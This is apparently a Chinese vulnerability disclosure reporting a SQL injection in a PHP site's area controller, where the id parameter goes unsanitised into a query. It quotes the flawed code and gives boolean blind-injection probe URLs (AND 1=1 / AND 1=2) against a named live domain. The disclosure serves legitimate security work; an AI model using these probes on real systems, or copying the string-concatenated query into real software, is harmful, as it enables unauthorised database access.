### 简要描述:
未对id进行参数类型强制传化,使得存在注入
### 详细说明:
\app\controller\area.class.php中未对id进行处理,存在注入
```
public function getCitys() {
$aeraObj = M("area");
$provinceId = $_GET["id"]; //未进行任何处理
return $aeraObj->getCitysByProvinceId($provinceId);
}
```
\app\model\areaAction.class.php 下直接进行sql处理
```
public function getCitysByProvinceId($provinceId) {
$type = $_GET['type'];
$ary =$this->where("pid = ".$provinceId)->limit(1000)->find(); //$provinceId未处理
```
### 漏洞证明:
访问:http://www.teamcen.com/index.php?id=1&ac=area_getCitys正常显示
接着 http://www.teamcen.com/index.php?id=1 AND 1=1&ac=area_getCitys
```
```
[<img src="https://images.seebug.org/upload/201401/1323402565c151a9a447a9d8b69e9b1894d76dfd.png" alt="1=1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/1323402565c151a9a447a9d8b69e9b1894d76dfd.png)
```
```
再接着 http://www.teamcen.com/index.php?id=1 AND 1=2&ac=area_getCitys
[<img src="https://images.seebug.org/upload/201401/132341064705121bc1aaedf2d009e45f03265f34.png" alt="1=2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/132341064705121bc1aaedf2d009e45f03265f34.png)
本地测试 可判断出 管理员用户个数为1
[<img src="https://images.seebug.org/upload/201401/13234538e80634ca75be28f5eb8b018c775fb16c.png" alt="count=1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/13234538e80634ca75be28f5eb8b018c775fb16c.png)
.... 各种盲注判断了
京公网安备 11010502034610号
暂无评论